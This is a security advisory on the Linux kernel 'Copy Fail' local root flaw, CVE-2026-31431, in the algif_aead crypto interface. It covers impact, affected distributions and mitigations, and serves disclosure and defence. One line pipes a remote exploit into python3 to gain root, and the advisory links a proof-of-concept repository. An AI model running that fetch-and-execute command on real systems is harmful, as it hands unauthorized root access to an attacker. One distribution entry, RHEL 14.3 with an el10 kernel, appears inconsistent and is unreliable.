Linux Kernel’s ‘Copy Fail’ CVE‑2026‑31431: A 732‑Byte Python Script Grants Root in One Step

Abstract

On 2026‑04‑29 security researchers disclosed a high‑severity local privilege‑escalation vulnerability in the Linux kernel, CVE‑2026‑31431 “Copy Fail”. A 732‑byte Python script can elevate a regular user to root and may enable container escape and breach of cloud‑tenant isolation.

Vulnerability Overview

CVE: CVE‑2026‑31431 Name: Copy Fail Discoverer: Theori Xint Code team Severity: High (local privilege escalation, container escape)

One‑Sentence Description

The bug resides in the algif_aead crypto interface, introduced by a 2017 in‑place optimization commit 72548b093ee3. It allows a non‑privileged user to write four arbitrary bytes into the kernel page cache via an AF_ALG socket combined with the splice() system call, corrupting setuid binaries such as /usr/bin/su to gain root.

Technical Background

AF_ALG : user‑space cryptographic socket interface exposed to all users.

AEAD : authenticated encryption mode (e.g., AES‑GCM).

authencsn template : specific AEAD implementation that writes data to the target buffer during decryption.

splice() : system call that transfers data between file descriptors without copying, used to link file page cache with socket buffers.

Core Logic Flaw

During decryption the page‑cache page of the target file is linked to a writable scatterlist.

The authencsn decryption routine writes four bytes to the page before verifying the authentication tag.

This provides a fully controllable four‑byte write primitive directly into the page cache.

Why It Is Dangerous

No race conditions, kernel‑specific offsets, or retries are required—the attack path is linear.

The write bypasses the normal VFS write path and does not mark the page as dirty, so integrity checks cannot detect the modification.

Page cache is globally shared; any process reading the altered file sees the tampered version.

Containers share the same page cache with the host, enabling cross‑container infection.

Impact Scenarios

Multi‑user shared hosts (development machines, jump hosts, build servers): any regular user can obtain root and fully control the host.

Kubernetes / container clusters : low‑privilege processes inside containers can corrupt the host’s page cache, achieving container escape and host takeover.

CI/CD pipelines (GitHub Actions self‑hosted runners, GitLab Runner, Jenkins agents): untrusted PR code can root the runner host.

Cloud services (notebook hosting, sandboxes, serverless): tenant code can break isolation and access the host.

Standard single‑tenant servers : when combined with other exploits, low‑privilege access can lead to privilege escalation.

Personal desktops/laptops : local code execution can easily obtain root; remote exploitation requires additional conditions.

Affected Range

All Linux kernels built from 2017 up to the patch commit are vulnerable, covering the majority of mainstream distributions.

Confirmed Affected Distributions

Ubuntu 24.04 LTS (kernel 6.17.0‑1007‑aws)

Amazon Linux 2023 (kernel 6.18.8‑9.213.amzn2023)

RHEL 14.3 (kernel 6.12.0‑124.45.1.el10_1)

SUSE 16 (kernel 6.12.0‑160000.9‑default)

Theoretically Affected Distributions

Debian, Arch Linux, Fedora, Rocky Linux, AlmaLinux, Oracle Linux, and many embedded/custom systems.

Vulnerable Kernel Versions

Versions 4.14 up to the last unpatched release.

Versions not affected: 6.18.22+, 6.19.12+, 7.0+.

Remediation

Immediate Update

Upgrade the kernel to a version that includes commit a664bf3d603d.

Ubuntu/Debian: install the latest linux-image package from official security advisories.

RHEL/CentOS/Rocky/Alma: monitor Red Hat security updates; the fix for RHEL 10/8/9 is currently “Fix deferred”.

Amazon Linux: follow AWS security announcements; the fix is pending.

Temporary Mitigation

Disable the vulnerable algif_aead kernel module to block exploitation:

# Unload the module (if AEAD sockets are not in use)
sudo rmmod algif_aead
# Or blacklist it permanently via modprobe
echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/blacklist‑algif_aead.conf

Warning: Disabling this module disables user‑space AEAD crypto interfaces, which may affect applications such as certain VPNs or TLS libraries.

Verifying Vulnerability

Check if the module is loaded: lsmod | grep algif_aead Test the PoC (authorized environments only):

curl https://copy.fail/exp | python3 && su

Brief Summary

A 732‑byte Python script can obtain root without kernel debugging, network access, or race conditions.

The flaw resides in the kernel crypto subsystem and has existed from 2017 to 2026, affecting a wide range of distributions.

The primary threat is container escape, allowing an attacker to jump from a compromised container to the host and break tenant isolation.

Patch priority is extremely high, especially in shared‑kernel scenarios such as cloud, Kubernetes, and CI/CD pipelines.

Demonstration code:

https://github.com/theori-io/copy-fail-CVE-2026-31431

This article provides a security advisory and defensive guidance; do not test the exploit on unauthorized systems.